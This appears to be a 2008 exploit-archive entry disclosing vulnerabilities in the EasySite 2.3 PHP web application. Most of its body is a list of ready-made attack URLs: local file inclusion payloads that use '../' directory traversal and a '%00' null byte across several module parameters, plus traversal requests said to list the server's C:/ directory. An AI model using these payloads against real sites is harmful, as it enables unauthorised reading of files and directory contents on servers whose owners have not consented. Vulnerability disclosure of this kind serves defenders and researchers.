easysite 2.3 - Multiple Vulnerabilities

Author: SirGod
type: webapps
platform: php
port: 
date_added: 2008-08-20  
date_updated:   
verified: 1  
codes: OSVDB-48623;CVE-2008-4155;OSVDB-48622;OSVDB-48621;OSVDB-48620;OSVDB-47657;OSVDB-47656  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6288.txt  

####################################################################
[+] EasySite v2.3 Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN
####################################################################

[+] Local File Inclusion

http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00

And many others...

This will open autoexec.bat

[+] Arbitrary View Folder Contents

You can view the folder contents and the content of files view via LFI.

    http://localhost/www/index.php?module=../../../

    http://localhost/inc/vmenu.php?module=../../../

This will open C:/ directory and will show all the files from C:/ .

Example :

    * BOOTSECT.BAK
    * BcBtRmv.log
    * IO.SYS
    * MSDOS.SYS
    * autoexec.bat
    * bootmgr
    * config.sys
    * grldr
    * hiberfil.sys
    * pagefile.sys

####################################################################

# milw0rm.com [2008-08-21]